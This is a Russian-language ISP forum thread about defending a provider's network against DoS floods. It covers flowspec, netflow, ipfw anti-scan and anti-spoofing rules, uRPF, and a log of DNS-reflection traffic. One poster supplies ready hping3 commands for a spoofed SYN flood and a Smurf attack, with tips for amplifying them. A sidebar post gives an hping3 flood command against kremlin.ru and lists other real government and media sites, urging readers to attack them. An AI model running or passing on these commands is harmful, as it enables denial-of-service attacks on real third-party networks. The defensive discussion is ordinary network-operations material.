Перейти до

как бороться с DoS на сеть провайдера?


Рекомендованные сообщения

активно досят мои ір 

тсп/удп

заяву в  кибер уже написал

кто как наблюдает/борется?

у меня софт бджп на никсе

Ссылка на сообщение
Поделиться на других сайтах
  • Відповіді 61
  • Створено
  • Остання відповідь

Top Posters In This Topic

Top Posters In This Topic

Popular Posts

Это если в двух слова, на самом деле защиты строятся посерьезней Типы DDoS-атак https://ddos-guard.net/ru/terminology   Защита от хакерских атак с помощью ipfw https://www.opennet.ru/base/sec

Когда к тебе летит 2-5M pps флуда на ~ 500-1000Мбит, или Луна под откос, Ты можете сколько угодно без толку крутить-вертеть абсолютно любую железяку, самое разумное похлопать перед смертью жену по поп

При синк-флуде рандомными ойпи помогает нулроут на адрес атакуемого.  Но не на долго :))))   Вот примеры для атак (нейротерорризма):   1. DoS Land hping3 -V -c 13666 -d 120 -S

Posted Images

3 часа назад, LV10 сказал:

flowspec в идеале, netflow, jflow или sampling на крайний случай

 

спасибо 

 

пробую: https://forums.freebsd.org/threads/49724/

Ссылка на сообщение
Поделиться на других сайтах
3 часа назад, USD сказал:

магистрали просят ір конкретние, или ето не хотят помогать?

 

как диагностировать конкретние іп ?

Так будет просто охренительно большой список ИПшек, и он тебе ничем не поможет. 

 

Кстати ты уверен, что это тебя ддосят, а не ты кого-то? :)

Ссылка на сообщение
Поделиться на других сайтах
31 минуту назад, tkapluk сказал:

Так будет просто охренительно большой список ИПшек, и он тебе ничем не поможет. 

 

Кстати ты уверен, что это тебя ддосят, а не ты кого-то? :)

1. В блекхол кидают свои іп а не чужие

2. Абсолютно, походу конкуренти развлекаются.

И спасибо по существу мне ответили више.

Ссылка на сообщение
Поделиться на других сайтах

При синк-флуде рандомными ойпи помогает нулроут на адрес атакуемого.  Но не на долго :))))

 

Вот примеры для атак (нейротерорризма):

 

1. DoS Land

hping3 -V -c 13666 -d 120 -S -w 32 -p 0 -s 80 --flood --rand-source VICTIM_IP_ADDRESS

 

Вот это, пожалуй, самая жестяковая атака для пионернета. Если запустить в несколько потоков ( в конце команды & и так несколько копий команд), ляжет все где бутылочные горшлыки. Все, что софвтово обрабатывает пакеты умрет на широком канале вверх по трассе :). Источник атаки можно отследить по графикам "вниз". IP атакующего не виден.  А если с разных мест, и в договорняке... уууу... жесть. 

Как бороться с этой нечестью ? :) Пфф.. только сообща :)

 

2. Smurf DoS

 

hping3 -1 --flood -a VICTIM_IP BROADCAST_ADDRESS

Тут все просто. Сканим сетку жертвы (например Angry IP Scanner), вычисляем бродкасты и лупим по ним. К примеру сеть 192.168.1.0/24, бродкаст 192.168.1.255. Лупим по нему, а он, в свою очередь отвечает арп-ами. Если комбинировать эти атаки настойчиво, то атакуемый последние волосы на жопе вырвет от злости.

 

Есть еще куча всяких рецептов по взлому, ловли на живца и тд.

Что не ясно - спрашивайте. И давайте делится опытом.

Всем удачи :)

 

 

 

Відредаговано loki
  • Like 2
Ссылка на сообщение
Поделиться на других сайтах
10 часов назад, loki сказал:

1. DoS Land

hping3 -V -c 13666 -d 120 -S -w 32 -p 0 -s 80 --flood --rand-source VICTIM_IP_ADDRESS

 

Вот это, пожалуй, самая жестяковая атака для пионернета. Если запустить в несколько потоков ( в конце команды & и так несколько копий команд), ляжет все где бутылочные горшлыки. Все, что софвтово обрабатывает пакеты умрет на широком канале вверх по трассе :). Источник атаки можно отследить по графикам "вниз". IP атакующего не виден.  А если с разных мест, и в договорняке... уууу... жесть. 

Как бороться с этой нечестью ? :) Пфф.. только сообща

Для этого многие ДЦ и провайдеры режут спуфинг. Нужно еще поискать, откуда можно провести атаку.

Ссылка на сообщение
Поделиться на других сайтах

Обколются своей марихуаной, а потом я*** друг друга в с****!

ОБСТАВЯЦА СВАИМИ СУФТРУТЕРАМИ А ПАТОМ ПЫШУТЬ ДРУХ ДРУХУ ПАМАХИТЕ НА ФОРУМИ

НУЖНА СТАВИТЬ ЦИСКА АСР И БИГИПИ ФЛОУСПЕК С АПЛИНКАМИ БУДУВАТЬ!

 

:)

  • Haha 1
Ссылка на сообщение
Поделиться на других сайтах

Это если в двух слова, на самом деле защиты строятся посерьезней

Типы DDoS-атак
https://ddos-guard.net/ru/terminology
 
Защита от хакерских атак с помощью ipfw
https://www.opennet.ru/base/sec/ipfw_antihack.txt.html

На бордеры

# Запрет X-сканирования:
add 1001 reject log tcp from any to any tcpflags fin, syn, rst, psh, ack, urg
# Запрет N-сканирования:
add 1002 reject log tcp from any to any tcpflags !fin, !syn, !rst, !psh, !ack, !urg
# Запрет FIN-сканирования:
add 1003 reject log tcp from any to any not established tcpflags fin
# Защита от спуфинга
add 1004 deny log ip from any to any not verrevpath in

На сервисы

# Ограничение числа одновременных соединений:
add 1005 allow ip  from any to any  setup limit src-addr 10

  • Like 3
Ссылка на сообщение
Поделиться на других сайтах

Если свой почтовик и конектятся клиентом, то нужно учитывать что клиент удерживает открытую сесию на каждый ящик, тут может и 20 быть и 100.

Для чужих 10 с головой.

Ссылка на сообщение
Поделиться на других сайтах
7 часов назад, masters сказал:

Для этого многие ДЦ и провайдеры режут спуфинг. Нужно еще поискать, откуда можно провести атаку.

И много таких провайдеров по Украине? Кто у себя настроил uRPF?

Ссылка на сообщение
Поделиться на других сайтах

маленький пример

Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:22968 from 178.223.40.201:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:22968 from 178.223.40.201:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX last message repeated 2 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:16202 from 108.61.182.21:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX last message repeated 8 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX last message repeated 2 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX last message repeated 2 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:2163 from 122.129.105.169:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53

Ссылка на сообщение
Поделиться на других сайтах
28 минут назад, USD сказал:

маленький пример

Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:22968 from 178.223.40.201:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:22968 from 178.223.40.201:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX last message repeated 2 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:27886 from 85.27.176.147:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:16202 from 108.61.182.21:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:55619 from 109.93.80.142:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX last message repeated 8 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX last message repeated 2 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX last message repeated 2 times
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:2163 from 122.129.105.169:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:9986 from 46.219.23.67:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:60344 from 87.97.71.125:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53
Jan 26 20:40:32 XxXxX kernel: Connection attempt to UDP XxXxX:12860 from 91.90.72.181:53

http://whiteglasses.livejournal.com/109620.html

Ссылка на сообщение
Поделиться на других сайтах
6 часов назад, pavlabor сказал:

Это если в двух слова, на самом деле защиты строятся посерьезней

Типы DDoS-атак
https://ddos-guard.net/ru/terminology
 
Защита от хакерских атак с помощью ipfw
https://www.opennet.ru/base/sec/ipfw_antihack.txt.html

На бордеры

# Запрет X-сканирования:
add 1001 reject log tcp from any to any tcpflags fin, syn, rst, psh, ack, urg
# Запрет N-сканирования:
add 1002 reject log tcp from any to any tcpflags !fin, !syn, !rst, !psh, !ack, !urg
# Запрет FIN-сканирования:
add 1003 reject log tcp from any to any not established tcpflags fin
# Защита от спуфинга
add 1004 deny log ip from any to any not verrevpath in

На сервисы

# Ограничение числа одновременных соединений:
add 1005 allow ip  from any to any  setup limit src-addr 10

 

 

До 3.14зды твоя теория ))).   Когда к тебе летит 1лям пакетов на 300 Мбитной ширине, то твой фаер сходит с ума  Спорим ? :)))) Твой копипастный пример с реальностью ничего общего не имеет. А на 10G полоске, нагенерить вообще такую кучу можно...

Відредаговано loki
Ссылка на сообщение
Поделиться на других сайтах

Это трафикавая атака, не мелкими пакетами, а крупными и ей вообще похер на файрвол, она просто весь канал забьет. Решить проблему можно только в сетях магистралов, фильтруая трафик ближе к источникам атаки. Вон хотя бы как мастерс в самом верху предлагал.

Ссылка на сообщение
Поделиться на других сайтах
2 часа назад, foreverok сказал:

И много таких провайдеров по Украине? Кто у себя настроил uRPF?

Те у кого руки и мозги с правильного места, и которые думают напред готовы отразить. Остальные 90% ляжут от любой детской шалости.

Ссылка на сообщение
Поделиться на других сайтах
31 минуту назад, ttttt сказал:

Это трафикавая атака, не мелкими пакетами, а крупными и ей вообще похер на файрвол, она просто весь канал забьет. Решить проблему можно только в сетях магистралов, фильтруая трафик ближе к источникам атаки. Вон хотя бы как мастерс в самом верху предлагал.

Чем меньше размер пакета и больше их ряд, тем хуже софтроутеру . Все ж можно руками задать. То просто пример.

Главное, найти открытый сокет от которого можно "просить" ответ :).  Поверь, больше 90% провайдеров уязвимы к примитивным и детским атакам. Все благодаря широким каналам и  теоретикам-админам.

Ааа магистралам вообще пох. Они не готовы раскошелиться на дорогие Л7 железки.

Назовите магистралов которые могут защитить ? :) И сколько это будет стоить.

 

 

Відредаговано loki
Ссылка на сообщение
Поделиться на других сайтах
10 часов назад, masters сказал:

Для этого многие ДЦ и провайдеры режут спуфинг. Нужно еще поискать, откуда можно провести атаку.

Ой не смешите меня. Как эту режут ? Контролируют каждый открытый сокет на адресах  своих клиентов ? )))

Атаку произвести можно из кучи мест. В общем это. Пионервойны наступили, или не ))))?

Ссылка на сообщение
Поделиться на других сайтах
41 минуту назад, loki сказал:

Ой не смешите меня. Как эту режут ? Контролируют каждый открытый сокет на адресах  своих клиентов ? )))

Атаку произвести можно из кучи мест. В общем это. Пионервойны наступили, или не ))))?

Большинство нормальных магистралов не пропускают трафик от ип не анонсированные в райпе.

Этот простой прием режет 90% спуфинга.

Поэтому твое дебильное предположение "Контролируют каждый открытый сокет на адресах  своих клиентов ?", говорит о довольно глубоких познаниях которые в конце концов сводится к "перегрызть лом зубами" - "Путин введи войска", или "дяденька нужно покупать помощнее железо".

Если ты внимательно прочитаешь то что я написал, то ты увидишь что это не мои рекомендации, приложены урлы где можно прочитать статьи полностью.

А посторонние системы безопасности это отдельная тема, о чем я также указал в своем посте.

 

 

Ссылка на сообщение
Поделиться на других сайтах

Создайте аккаунт или войдите в него для комментирования

Вы должны быть пользователем, чтобы оставить комментарий

Создать аккаунт

Зарегистрируйтесь для получения аккаунта. Это просто!

Зарегистрировать аккаунт

Вхід

Уже зарегистрированы? Войдите здесь.

Войти сейчас
  • Зараз на сторінці   0 користувачів

    Немає користувачів, що переглядають цю сторінку.

  • Схожий контент

    • Від Daniil_
      Ищу партнера, который сможет предложить ddos защиту для dns only
      трафика мало, на днс порядка 10к доменов
       
      что нужно
      - пересылать только dns пакеты (53 порт)
      - чтобы при атаке по icmp dns пакеты продолжали пересылаться
      - при флуде на dns порт фильтровать запросы
       
      пробовали работать с компаниями, которые специализируются на защите web трафика, получили много проблем с тем, что dns запросы не все отрабатывали
       
    • Від vovaputin
      Братья украинцы, не откажите в помощи, порнохаб заблочили, трафик упал, железо простаивает.
      У кого линукс попингуйте меня. Сисадмин скучает.
       
      hping3 --rand-source -i u10 -S -d 1400 kremlin.ru
       
      sberbank.ru
      ntv.ru
      lenta.ru
      roskazna.gov.ru
      vsrf.ru
      council.gov.ru
       
      все мы ждем от вас кто сколько может.
       
      ps
      -i u100 = 60 мбит
      -i u10 = 600 мбит
      -i u1 = 6 гбит
       
    • Від antiddos
      Уважаемые господа!
       
       
       
      Предлагаем Вашему вниманию сервис по защите от DDoS атак для ваших сайтов, серверов, сетей.
       
      Наша компания на рынке более 10 лет. 
      Мы представляем собой распределенную CDN с центрами фильтрации в Украине, Польше и Нидерландах.
      Наши решения построено на оборудовании Radware, Brocade, Juniper и позволяют фильтровать большие обьемы трафика. Мы работаем с любыми атаками включая L2-L7.
       
      Приглашаем к участию в партнерскую программу интеграторов и администраторов сетей, в которой вы будете получать гарантированное вознаграждение за привличенных клиентов. (условия вас приятно удивят!)
       
      Для всех желающих можем предоставить тестовую защиту на сутки. 
       
      Кроме того, для всех наших клиентов мы предоставляем услугу High Load consulting абсолютно бесплатно, как и администрирование выделенного сервера.
       
      Стоимость услуг для украинских пользователей:
      - Удаленная защита сайта без переноса контента на нашу площадку от 1000грн
      - Хостинг с защитой от DDoS от 1350грн
      - Виртуальный выделенный сервер с защитой от DDoS от 3000грн
      - Выделенный сервер с защитой от DDoS от 4000грн.
       
      Будем рады видеть Вас в числе наших клиентов. 
       
       
      Hi-Load Systems LLC
       Украина, 49000
       Днепр, ул. Казакова, 2Д
       БЦ «Континент»
       +380 68 420 0111; +380 95 420 0111
       
       
       
       
    • Від pavlabor
      В 2019 году продолжаются DDoS-атаки с использованием протокола LDAP: в этот раз на сайт Qiwi
      В четверг, 24 января, мы наблюдали атаку 212,5 Gbps (гигабит в секунду) / ~10 Mpps (миллионов пакетов в секунду) в пике, комбинировавшую векторы старого доброго SYN-флуда и достаточно редкой LDAP-амплификации с фрагментами.

    • Від KGroup
      Доброго времени суток коллеги.
      Такая проблема случилось...
      Взломали сеть - положили биллинг и микротик основной. 
      Также сдохло железо (программно) все что касается оборудования микротик и юбикюти. 
      Восстанавливаем уже третьи сутки.
       
      Вопрос:
      Как дальше обезопасить сеть? Какое железо и ПО преобрести чтобы упредить данные неприятные инсинуации.
      Офтоп... просьба не поддергивать и не писать нелепые сообщения, попросту помочь советом.
      Заранее спасибо.

×
×
  • Створити нове...